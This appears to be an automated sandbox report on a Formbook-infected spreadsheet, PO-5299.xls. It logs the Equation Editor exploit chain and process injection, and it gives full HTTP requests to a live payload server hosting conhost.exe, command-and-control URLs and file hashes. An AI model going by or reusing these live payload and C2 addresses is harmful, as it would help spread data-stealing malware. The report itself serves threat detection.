Analysis

  • max time kernel
    145s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    19/01/2024, 16:14 UTC

General

  • Target

    PO-5299.xls

  • Size

    389KB

  • MD5

    ca93ad9d9887663ed1afc2197b775268

  • SHA1

    017bb90012dfa9fd9a6a05efd01d1d929e411039

  • SHA256

    3a1b13e80cfd6e053f5a605e531c17a936a33fc5c5467e40be5a8845a2d2dbcb

  • SHA512

    02278f911322f744155b59908b13fcb69fed701230921cdf3ae041ec1beafafb24322712025498925e192922203b3325e8e7896c156a489c43e992e8d02585af

  • SSDEEP

    6144:6zcOPqGlSHBMixiMK6G+ZFrTUvCp4sJgKWQdywS26nd1WejItjFGDoo1Cz:6zBZlQpozwjTqCfgKFdyV2Qjc5GY

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

he09

Decoy


Signatures

  • Formbook

    Formbook is a data-stealing malware family.

  • Formbook payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Abuses OpenXML format to download file from external location
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1184
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-5299.xls
      2⤵
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2484
    • C:\Windows\SysWOW64\cmstp.exe
      "C:\Windows\SysWOW64\cmstp.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2084
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\conhost.exe"
        3⤵
          PID:1804
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        2⤵
          PID:1500
      • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        1⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Launches Equation Editor
        • Suspicious use of WriteProcessMemory
        PID:2176
        • C:\Users\Admin\AppData\Roaming\conhost.exe
          "C:\Users\Admin\AppData\Roaming\conhost.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1972
          • C:\Users\Admin\AppData\Roaming\conhost.exe
            "C:\Users\Admin\AppData\Roaming\conhost.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:2992

      Network

      • flag-us
        GET
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        EXCEL.EXE
        Remote address:
        172.245.208.28:80
        Request
        GET /wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
        Host: 172.245.208.28
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 19 Jan 2024 16:14:13 GMT
        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
        Last-Modified: Thu, 18 Jan 2024 14:14:10 GMT
        ETag: "10998-60f38fa36f95a"
        Accept-Ranges: bytes
        Content-Length: 67992
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/msword
      • flag-us
        OPTIONS
        http://172.245.208.28/wedf/wed/
        WINWORD.EXE
        Remote address:
        172.245.208.28:80
        Request
        OPTIONS /wedf/wed/ HTTP/1.1
        User-Agent: Microsoft Office Protocol Discovery
        Host: 172.245.208.28
        Content-Length: 0
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 19 Jan 2024 16:14:15 GMT
        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
        X-Powered-By: PHP/8.1.17
        Content-Length: 0
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-us
        HEAD
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        WINWORD.EXE
        Remote address:
        172.245.208.28:80
        Request
        HEAD /wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: 172.245.208.28
        Content-Length: 0
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 19 Jan 2024 16:14:19 GMT
        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
        Last-Modified: Thu, 18 Jan 2024 14:14:10 GMT
        ETag: "10998-60f38fa36f95a"
        Accept-Ranges: bytes
        Content-Length: 67992
        Keep-Alive: timeout=5, max=99
        Connection: Keep-Alive
        Content-Type: application/msword
      • flag-us
        HEAD
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        WINWORD.EXE
        Remote address:
        172.245.208.28:80
        Request
        HEAD /wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: 172.245.208.28
        Response
        HTTP/1.1 200 OK
        Date: Fri, 19 Jan 2024 16:14:18 GMT
        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
        Last-Modified: Thu, 18 Jan 2024 14:14:10 GMT
        ETag: "10998-60f38fa36f95a"
        Accept-Ranges: bytes
        Content-Length: 67992
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/msword
      • flag-us
        GET
        http://172.245.208.28/5299/conhost.exe
        EQNEDT32.EXE
        Remote address:
        172.245.208.28:80
        Request
        GET /5299/conhost.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
        Host: 172.245.208.28
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 19 Jan 2024 16:14:19 GMT
        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
        Last-Modified: Fri, 19 Jan 2024 10:22:30 GMT
        ETag: "aee00-60f49db8ce69d"
        Accept-Ranges: bytes
        Content-Length: 716288
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
      • flag-us
        DNS
        www.neu-de-update.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.neu-de-update.com
        IN A
        Response
      • flag-us
        DNS
        www.jpedwardscoaching.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.jpedwardscoaching.com
        IN A
        Response
        www.jpedwardscoaching.com
        IN CNAME
        jpedwardscoaching.com
        jpedwardscoaching.com
        IN A
        3.33.130.190
        jpedwardscoaching.com
        IN A
        15.197.148.33
      • flag-us
        GET
        http://www.jpedwardscoaching.com/he09/?dZotnbmP=J0rZNCGg3B+DcYuwho5klUavYHikY0sXv/Xz31CM7w7Vqsj+/+8osxPzbs8K2wbM&SDH=7nMtdDf88J9xQhJ0
        Explorer.EXE
        Remote address:
        3.33.130.190:80
        Request
        GET /he09/?dZotnbmP=J0rZNCGg3B+DcYuwho5klUavYHikY0sXv/Xz31CM7w7Vqsj+/+8osxPzbs8K2wbM&SDH=7nMtdDf88J9xQhJ0 HTTP/1.1
        Host: www.jpedwardscoaching.com
        Connection: close
        Response
        HTTP/1.1 403 Forbidden
        Server: openresty
        Date: Fri, 19 Jan 2024 16:15:46 GMT
        Content-Type: text/html
        Content-Length: 150
        Connection: close
      • flag-us
        DNS
        www.popla9001.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.popla9001.com
        IN A
        Response
      • flag-us
        DNS
        www.fino-shop.store
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.fino-shop.store
        IN A
        Response
        www.fino-shop.store
        IN CNAME
        fino-shop.store
        fino-shop.store
        IN A
        162.240.81.18
      • flag-us
        GET
        http://www.fino-shop.store/he09/?dZotnbmP=QwDeHw0hm9ai4ucO3/tPkzm6xVUnXnh9QB1twhKxzMA6FnoKpkL4gAt396yd8siy&SDH=7nMtdDf88J9xQhJ0
        Explorer.EXE
        Remote address:
        162.240.81.18:80
        Request
        GET /he09/?dZotnbmP=QwDeHw0hm9ai4ucO3/tPkzm6xVUnXnh9QB1twhKxzMA6FnoKpkL4gAt396yd8siy&SDH=7nMtdDf88J9xQhJ0 HTTP/1.1
        Host: www.fino-shop.store
        Connection: close
        Response
        HTTP/1.1 404 Not Found
        Server: nginx/1.20.1
        Date: Fri, 19 Jan 2024 16:16:27 GMT
        Content-Type: text/html
        Content-Length: 3650
        Connection: close
        ETag: "636d2d22-e42"
      • 172.245.208.28:80
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        http
        EXCEL.EXE
        1.9kB
        70.4kB
        32
        53

        HTTP Request

        GET http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC

        HTTP Response

        200
      • 172.245.208.28:80
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        http
        WINWORD.EXE
        1.1kB
        1.4kB
        16
        6

        HTTP Request

        OPTIONS http://172.245.208.28/wedf/wed/

        HTTP Response

        200

        HTTP Request

        HEAD http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC

        HTTP Response

        200
      • 172.245.208.28:80
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        http
        WINWORD.EXE
        510 B
        495 B
        6
        4

        HTTP Request

        HEAD http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC

        HTTP Response

        200
      • 172.245.208.28:80
        http://172.245.208.28/5299/conhost.exe
        http
        EQNEDT32.EXE
        13.0kB
        737.8kB
        276
        530

        HTTP Request

        GET http://172.245.208.28/5299/conhost.exe

        HTTP Response

        200
      • 3.33.130.190:80
        http://www.jpedwardscoaching.com/he09/?dZotnbmP=J0rZNCGg3B+DcYuwho5klUavYHikY0sXv/Xz31CM7w7Vqsj+/+8osxPzbs8K2wbM&SDH=7nMtdDf88J9xQhJ0
        http
        Explorer.EXE
        407 B
        549 B
        5
        6

        HTTP Request

        GET http://www.jpedwardscoaching.com/he09/?dZotnbmP=J0rZNCGg3B+DcYuwho5klUavYHikY0sXv/Xz31CM7w7Vqsj+/+8osxPzbs8K2wbM&SDH=7nMtdDf88J9xQhJ0

        HTTP Response

        403
      • 162.240.81.18:80
        http://www.fino-shop.store/he09/?dZotnbmP=QwDeHw0hm9ai4ucO3/tPkzm6xVUnXnh9QB1twhKxzMA6FnoKpkL4gAt396yd8siy&SDH=7nMtdDf88J9xQhJ0
        http
        Explorer.EXE
        447 B
        4.1kB
        6
        6

        HTTP Request

        GET http://www.fino-shop.store/he09/?dZotnbmP=QwDeHw0hm9ai4ucO3/tPkzm6xVUnXnh9QB1twhKxzMA6FnoKpkL4gAt396yd8siy&SDH=7nMtdDf88J9xQhJ0

        HTTP Response

        404
      • 8.8.8.8:53
        www.neu-de-update.com
        dns
        Explorer.EXE
        67 B
        140 B
        1
        1

        DNS Request

        www.neu-de-update.com

      • 8.8.8.8:53
        www.jpedwardscoaching.com
        dns
        Explorer.EXE
        71 B
        117 B
        1
        1

        DNS Request

        www.jpedwardscoaching.com

        DNS Response

        3.33.130.190
        15.197.148.33

      • 8.8.8.8:53
        www.popla9001.com
        dns
        Explorer.EXE
        63 B
        136 B
        1
        1

        DNS Request

        www.popla9001.com

      • 8.8.8.8:53
        www.fino-shop.store
        dns
        Explorer.EXE
        65 B
        95 B
        1
        1

        DNS Request

        www.fino-shop.store

        DNS Response

        162.240.81.18

      MITRE ATT&CK Enterprise v15


      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

        Filesize

        128KB

        MD5

        a464081ab2a888e7dac6c7345551ed5c

        SHA1

        b18f174f8b9df0d7adeabb9109d16744cbaba4b1

        SHA256

        861028d264d972b8a26c496d646d52d3196d9c20091da7df5add64e1ed7467a6

        SHA512

        9c371f1ed662462ed6bc9aabd4f28b25e44fea08b194feeb8bbc293e90a59022601c7e18148222804c16574ba278c5000adccc1c7f2d54c25cd9c5990d4f8225

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{6B6EFF92-3AA9-420E-BDCF-33B25F175B2D}.FSD

        Filesize

        128KB

        MD5

        34a7b344eef925f5cf3cd0e58de20997

        SHA1

        30d0c5eafd3511614af679f01bb0bf36263d278f

        SHA256

        b84098c3f9e53f8c4027d1b364d0986be42c2234d8a2443c6b692d7743e0fabf

        SHA512

        c22d659c2a58bd170d432145c46c44637395b522736e7f8f1e0ecd8f683ba91bd6431a40a76397eea5eaa2e48b1f69d6bbdbde7d4261482e0d1a808ff5adb0be

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4K0WM73A\microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth[1].doc

        Filesize

        66KB

        MD5

        0f15c2649a458ea6d0421b673571b5af

        SHA1

        a7cd0504cee1402625b1ab2bd13e89d344b3cb60

        SHA256

        19903b449b7a97eff2293836d617b509039bc4b8b108b9b5ae299f0e2a2ce9d7

        SHA512

        61ffb5b2d56bc32ee03a4e9ea70adeb5869226e92e8e4bc3d26f29c08060c8d4f5350d6fde19e26a3e536b9aaee3c24b072d7541e01c217471cd3f9f2868a1b5

      • C:\Users\Admin\AppData\Local\Temp\{A0F5974B-E08F-4667-BCFA-7D17681CCBFB}

        Filesize

        128KB

        MD5

        e796020fce52f1b4cc98c45a2ef9f1d0

        SHA1

        0417d34b24d925a06d620475c711dc422609fb79

        SHA256

        c0686db13b1074c8163a786a17cde5d4ef4193bbadf623efc008ffe2d4dbad1e

        SHA512

        4796898ac9d90231cdd3a38d31853e301d7aaa12fe4d44e19eebe70e78e10a23d4b9aec1da432c01a5a1bba73b7fc849c06f1a47f60cd68f838e43748e40b61f

      • C:\Users\Admin\AppData\Roaming\conhost.exe

        Filesize

        605KB

        MD5

        4e970a3b8f394efb6020b1d7474bc147

        SHA1

        f519d4c73cc21fed56a4e2b2ea596215f4815f4b

        SHA256

        1a96da0b8cd4b80ebbe15e9ac2e4cc3552934d5e97f80a6533f97bc66095f126

        SHA512

        e6a2b04cef50f48c5bd89002766438233945f7f705cb864aa48ace5f26ab5f257dfe9d6a3139db21105381837f21304f3d4392aef51a4e883438fa77263ac2da

      • C:\Users\Admin\AppData\Roaming\conhost.exe

        Filesize

        699KB

        MD5

        591dac333aff7739bf01a4c9d3e838a5

        SHA1

        5211f3ab4d80644439220d11fb204eb2bee9fdb8

        SHA256

        0509f94b1130c86832027f9990c3f3da9a84bc00f1462e99e8ef16a806944bb4

        SHA512

        b511a6b960b2c092577ab8fbf20767e9ad5dc86682e76e630602cfd88b4e8bf9b8fa8fac7e60fd4aa40ca8bcb49f69b9e8e9cc5a44f4c4b03d6e3d38ff402bfd
